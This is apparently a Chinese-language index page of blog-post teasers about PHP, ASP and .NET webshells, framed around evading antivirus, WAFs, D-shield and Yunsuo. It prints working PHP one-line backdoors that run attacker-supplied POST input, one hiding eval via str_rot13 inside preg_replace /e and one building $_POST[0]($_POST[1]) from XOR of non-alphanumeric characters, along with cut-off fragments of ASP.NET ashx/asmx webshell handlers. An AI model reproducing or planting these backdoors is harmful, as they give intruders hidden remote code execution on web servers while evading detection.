最新免杀一句话

<?php ($sun = $_POST['pass']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');?>好吧 应网友需求,刚去做了个过d盾的,其他的没测试<?php$a = chr(92+5);$b&n

能秒99%的waf防火墙

开始详情看这:https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html原谅我见识短,没用过usort函数上面连接的文章中,发现有这个函数于是刚刚了解了下usort函数 usort函数干嘛的?官方介绍:http://php.net/manual/zh/function.usort.php通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调123

过狗过盾的php一句话(非字母数字的)

代码比较简单,利用php异或(^)非字母数字生成后门,
详细的有关php异或的解释,参考:编写变态的(非字母数字的)PHP后门
文中提到的这种:
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

php-cgi解析漏洞 绕过云锁拦截

云锁拦截.jpg

asp过狗过最新版本D盾一句话(无意中得到的)

.net下asmx一句话服务端两个

接力昨天的ashx一句话http://www.5kik.com/aspnews/646.html,今天放出的是基于webservice实现的一句话,另外还有asmx的小马 一并打包。<%@ WebService Language="JScript" class="ScriptMethodSpy"%>import System;import System.Web;import Syste

PHP使用流包装器实现WebShell

0×00 前言在Web安全领域WebShell的构造与查杀是永不停息的话题,这几天发现了一种新型方式生成WebShell,隐蔽度高,目前安全查杀软件没法检测到相关的后门漏洞,不同于 eval 或则 asset 等方式运行后门,对于这两个函数禁用的情况下一样适用,目前除了禁用相关函数还暂时没有相关方式来避免漏洞。0×01 后门原理在PHP开发中,我们使用最为频繁的指令大概就是 include 指令, include 指令中一些比较普通的文件包含漏洞我们就忽略了,先来看看一串代码:include&n

.net下ashx菜刀可用的一句话服务端两个

<%@ WebHandler Language="JScript" class="AsyncHandlerSpy"%>import System;import System.Web;import System.IO;public class AsyncHandlerSpy implements IHttpAsyncHandler{function

Deformity PHP Webshell、Webshell Hidden Learning

目录0. 引言1. webshell原理介绍2. webshell的常见类型以及变种方法3. webshell的检测原理以及检测工具4. webshell隐藏反检测对抗手段 0. 引言本文旨在研究Webshell的各种猥琐编写方式以及webshell后门的生成、检测技术,主要分享了一些webshell的编写方法以及当前对webshell的识别、检测技术的原理以及相应工具的使用,希望能给研究这一领域的朋友带来一点点帮助,同时抛砖引玉,和大

PHP中使用按位取反(~)函数创建后门